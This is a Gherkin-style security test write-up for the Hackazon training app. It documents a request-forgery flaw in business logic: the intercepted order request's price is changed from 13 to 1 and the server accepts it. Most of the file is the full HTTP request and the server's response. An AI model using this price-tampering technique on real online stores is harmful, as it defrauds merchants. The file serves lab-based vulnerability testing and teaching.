# language: en

Feature: Order items at a lower price
  From the Hackazon system
  Of the Test Ability to forge requests (OTG-BUSLOGIC-002) OWASP category

  Background:
    Given I'm running Ubuntu 16.04 LTS
    And using Docker Docker version 18.06.1-ce, build e68fc7a
    And also using OWASP ZAP 2.7.0
    Given the following scenario
      """
      URN: /api/orderItems
      """

  Scenario: Basic testing
    Given I'm autenticated
    When I "add to the cart" an item in the app
    And proceed to do the checkout
    And intercept the request
      """
      POST http://192.168.1.229/api/orderItems HTTP/1.1
      Authorization: Token 4f1e645e938f1220ca83ce1dcbc4b676a0293ba6
      Content-Type: application/json; charset=UTF-8
      Content-Length: 200
      User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.0; SM-G610M Build/NRD90M)
      Host: 192.168.1.229
      Connection: Keep-Alive

      {"cart_id":8,"created_at":"2018-10-01 10:41:44","id":0,
      "name":"\r\nMartha Stewart Gift Card Box, White Eyelet\r\n",
      "order_id":14,"price":13.0,"product_id":4,"qty":1,
      "updated_at":"2018-10-01 10:41:44"}
      """
    And alter the price to
      """
      "price":1.0
      """
    Then it places the order with the following body
      """
      {"id":"14","created_at":"2018-10-01 10:41:43",
      "updated_at":"2018-10-01 10:41:43","customer_firstname":"test_user",
      "customer_lastname":"","customer_email":"test_user@example.com",
      "status":"complete","comment":"","customer_id":"1",
      "payment_method":"creditcard","shipping_method":"mail",
      "coupon_id":null,"discount":"0",
      "orderAddress":[{"id":"27","full_name":"g","address_line_1":"g",
      "address_line_2":"g","city":"g","region":"h",
      "zip":"2","country_id":"RU","phone":"2",
      "customer_id":"1","address_type":"shipping","order_id":"14"},
      {"id":"28","full_name":"g","address_line_1":"g",
      "address_line_2":"g","city":"g","region":"h",
      "zip":"2","country_id":"RU","phone":"2","customer_id":"1",
      "address_type":"billing","order_id":"14"}],
      "orderItems":[{"id":"44","cart_id":"8",
      "created_at":"2018-10-01 10:41:44",
      "updated_at":"2018-10-01 10:41:44",
      "product_id":"4",
      "name":"\r\nMartha Stewart Gift Card Box, White Eyelet\r\n",
      "qty":"1","price":"13.0000","order_id":"14"},
      {"id":"45","cart_id":"8","created_at":"2018-10-01 10:41:44",
      "updated_at":"2018-10-01 10:41:44","product_id":"4",
      "name":"\r\nMartha Stewart Gift Card Box, White Eyelet\r\n",
      "qty":"1","price":"1.0000","order_id":"14"}],
      "increment_id":1000014,"total_price":14}
      """
    Then as a client i would get 2 gift card Boxes, one for 13 usd
    And other for 1 usd
    Then the vulnerability is confirmed
